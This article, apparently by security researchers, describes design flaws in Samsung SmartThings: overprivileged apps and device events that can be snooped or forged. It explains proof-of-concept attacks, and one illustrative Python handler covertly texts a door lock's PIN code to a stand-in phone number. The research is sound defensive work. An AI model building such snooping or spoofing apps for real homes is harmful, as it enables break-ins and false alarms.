Smart homes, an aspect of the Internet of Things, offer the promise of improved energy efficiency and control over home security. Integrating various devices can give users easy programming of many devices around the home, including appliances, cameras and alarm sensors. Several systems can handle this type of task, such as Samsung SmartThings, Google Brillo/Weave, Apple HomeKit, AllSeen AllJoyn and Amazon Alexa.
But there are also security risks. Smart home systems can leave owners vulnerable to serious threats, such as arson, blackmail, theft and extortion. Current security research has focused on individual devices, and how they communicate with each other. For example, the MyQ garage system can be turned into a surveillance tool, alerting would-be thieves when a garage door opened and then closed, and allowing them to remotely open it again after the residents had left. Flaws in the popular ZigBee communication protocol can allow attackers to join an otherwise secure home network.
Little research has focused on what happens when these devices are integrated into a coordinated system. We set out to determine exactly what these risks might be, in the hope of showing platform designers areas in which they should improve their software to better protect users’ security in future smart home systems.
Evaluating the security of smart home platforms
First, we surveyed most of the above platforms to understand the landscape of smart home programming frameworks. We looked at what systems existed, and what features they offered. We also looked at what devices they could interact with, whether they supported third-party apps, and how many apps were in their app stores. And, importantly, we looked at their security features.
We decided to focus deeper inquiry on SmartThings because it is a relatively mature system, with 521 apps in its app store, supporting 132 types of IoT devices for the home. In addition, SmartThings has a number of conceptual similarities to other, newer systems that make our insights potentially relevant more broadly. For example, SmartThings and other systems offer trigger-action programming, which lets you connect sensors and events to automate aspects of your home. That is the sort of capability that can turn your walkway lights on when a driveway motion detector senses a car driving up, or can make sure your garage door is closed when you turn your bedroom light out at night.
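The trigger-action style described above can be sketched as a tiny rule engine. This is an illustrative sketch only, with hypothetical function and event names; real SmartThings apps are written in a Groovy-based domain-specific language, not Python.

```python
# Minimal sketch of trigger-action programming (hypothetical rule
# engine, not SmartThings' actual API): rules bind a triggering
# event to an action to run.

rules = []

def when(trigger, action):
    """Register a rule: when `trigger` fires, run `action`."""
    rules.append((trigger, action))

def fire(event):
    """Deliver an event; run and collect every matching action."""
    return [action() for trigger, action in rules if trigger == event]

# Hypothetical rules mirroring the examples in the text.
when("driveway.motion",   lambda: "walkway lights on")
when("bedroom.light.off", lambda: "garage door closed")

results = fire("driveway.motion")   # the motion sensor triggers
```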
We tested for potential security holes in the system and 499 SmartThings apps (also called SmartApps) from the SmartThings app store, seeking to understand how prevalent these security flaws were.
Finding and attacking main weaknesses
We found two major categories of vulnerability: excessive privileges and insecure messaging.
Overprivileged SmartApps: SmartApps have privileges to perform specific operations on a device, such as turning an oven on and off or locking and unlocking a door. This idea is similar to smartphone apps asking for different permissions, such as to use the camera or get the phone’s current location. These privileges are grouped together; rather than getting separate permission for locking a door and unlocking it, an app would be allowed to do both – even if it didn’t need to.
For example, imagine an app that can automatically lock a specific door after 9 p.m. The SmartThings system would also grant that app the ability to unlock the door. An app’s developer cannot ask only for permission to lock the door.
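The coarse grouping of privileges can be sketched as follows. The capability names and the grouping table here are hypothetical simplifications, not the real SmartThings permission model, but they show the core problem: commands come bundled, and an app cannot request a strict subset.

```python
# Sketch of coarse-grained permission grouping (hypothetical
# capability names): commands are bundled per capability, so an app
# that needs "lock" is granted "unlock" too.

CAPABILITY_COMMANDS = {
    "capability.lock":    {"lock", "unlock"},       # bundled as one unit
    "capability.battery": {"readBatteryLevel"},
}

def granted_commands(requested):
    """Grant every command in each requested capability -- there is
    no way for an app to ask for only some of them."""
    granted = set()
    for capability in requested:
        granted |= CAPABILITY_COMMANDS[capability]
    return granted

# An auto-lock app only needs to lock a door after 9 p.m. ...
perms = granted_commands(["capability.lock"])
# ...but the platform grants it the ability to unlock as well.
```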
More than half – 55 percent – of the 499 SmartApps we studied had access to more functions than they needed.
Insecure messaging system: SmartApps communicate with physical devices by exchanging messages, analogous to instant messages exchanged between people. SmartThings devices send messages that can contain sensitive data, such as a PIN code to open a particular lock.
We found that as long as a SmartApp has even the most basic level of access to a device (such as permission to show how much battery life is left), it can receive all the messages the physical device generates – not just those messages about functions it has privileges to. So an app intended only to read a door lock’s battery level could also listen to messages that contain a door lock’s PIN code.
In addition, we found that SmartApps can “impersonate” smart-home equipment, sending out their own messages that look like messages generated by real physical devices. The malicious SmartApp can read the network’s ID for the physical device, and create a message with that stolen ID. That battery-level app could even covertly send a message as if it were the door lock, falsely reporting it had been opened, for example.
SmartThings does not ensure that only physical devices can create messages with a certain ID.
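Both messaging flaws can be illustrated with a toy event bus. This is a hypothetical sketch, not SmartThings internals: it models (1) any subscriber with any access to a device receiving all of that device's events, and (2) a publish path that never authenticates the claimed source device.

```python
# Sketch of the two messaging flaws (hypothetical event bus):
# subscriptions are per-device rather than per-privilege, and
# publishing does not verify the claimed source.

class EventBus:
    def __init__(self):
        self.handlers = {}   # device_id -> list of subscriber callbacks

    def subscribe(self, device_id, handler):
        # Flaw 1: no check that the subscriber holds the privilege an
        # event relates to -- any device-level access is enough.
        self.handlers.setdefault(device_id, []).append(handler)

    def publish(self, device_id, event):
        # Flaw 2: the caller simply claims `device_id`; the bus does
        # not verify the event came from the physical device.
        for handler in self.handlers.get(device_id, []):
            handler(event)

bus = EventBus()
seen = []
# A "battery monitor" app, granted only battery access, subscribes...
bus.subscribe("front-door-lock", seen.append)
# ...yet it receives the lock's sensitive PIN-code report anyway.
bus.publish("front-door-lock", {"name": "codeReport", "value": "1234"})
# And a malicious app can forge an event under the lock's stolen ID.
bus.publish("front-door-lock", {"name": "contact", "value": "open"})
```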
Attacking the design flaws
To move beyond the potential weaknesses into actual security breaches, we built four proof-of-concept attacks to demonstrate how attackers can combine and exploit the design flaws we found in SmartThings.
In our first attack, we built an app that promised to monitor the battery levels of various wireless devices around the home, such as motion sensors, leak detectors, and door locks. However, once installed by an unsuspecting user, this seemingly benign app was programmed to snoop on the other messages sent by those devices, exploiting a key vulnerability.
When the authorized user creates a new PIN code for a door lock, the lock itself will acknowledge the changed code by sending a confirmation message to the network. That message contains the new code, which could then be read by the malicious battery-monitoring app. The app can then send the code to its designer by SMS text message – effectively sending a house key directly to a prospective intruder.
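The covert behavior of such an app can be sketched as an event handler. The names here are hypothetical (`send_sms` stands in for the platform's real SMS service, and the phone number is made up): the "battery monitor" watches the event stream for lock-code reports and texts them out.

```python
# Sketch of the PIN-exfiltration behavior (hypothetical handler and
# SMS stand-in, not the app's real code).

outbox = []

def send_sms(number, body):
    # Stand-in for the platform's SMS service.
    outbox.append((number, body))

def battery_monitor_handler(event):
    if event["name"] == "battery":
        pass   # the advertised, benign behavior
    elif event["name"] == "codeReport":
        # Covert behavior: exfiltrate the newly set PIN code.
        send_sms("+15550123", "new door code: " + event["value"])

# The lock confirms a code change; the snooping handler sees it.
battery_monitor_handler({"name": "codeReport", "value": "5678"})
```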
In our second attack, we were able to snoop on the supposedly secure communications between a SmartApp and its companion Android mobile app. This allowed us to impersonate the Android app and send commands to the SmartApp – such as to create a new PIN code that would let us into the home.
Our third and fourth attacks involved writing malicious SmartApps that were able to take advantage of other security flaws. One custom SmartApp could disable “vacation mode,” a popular occupancy-simulation feature; we stopped a smart home system from turning lights on and off and otherwise behaving as if the home were occupied. Another custom SmartApp was able to falsely trigger a fire alarm by pretending to be a carbon monoxide sensor.
Room for improvement
Taking a step back, what does this mean for smart homes in general? Are these results indicative of the industry as a whole? Can smart homes ever be safe?
There are great benefits to gain from smart homes, and the Internet of Things in general, that ultimately lead to an improved quality of living. However, given the security weaknesses in today’s systems, caution is appropriate.
These are new technologies in nascent stages, and users should think about whether they are comfortable with giving third parties (e.g., apps or smart home platforms) remote access to their devices. For example, personally, I wouldn’t mind giving smart home technologies remote access to my window shades or desk lamps. But I would be wary of staking my safety on remotely controlled door locks, fire alarms, and ovens, as these are security- and safety-critical devices. If misused, those systems could allow – or even cause – physical harm.
However, I might change that assessment if systems were better designed to reduce the risks of failure or compromise, and to better protect users’ security.
Acknowledgements: This research is the result of a collaboration with Jaeyeon Jung and Atul Prakash.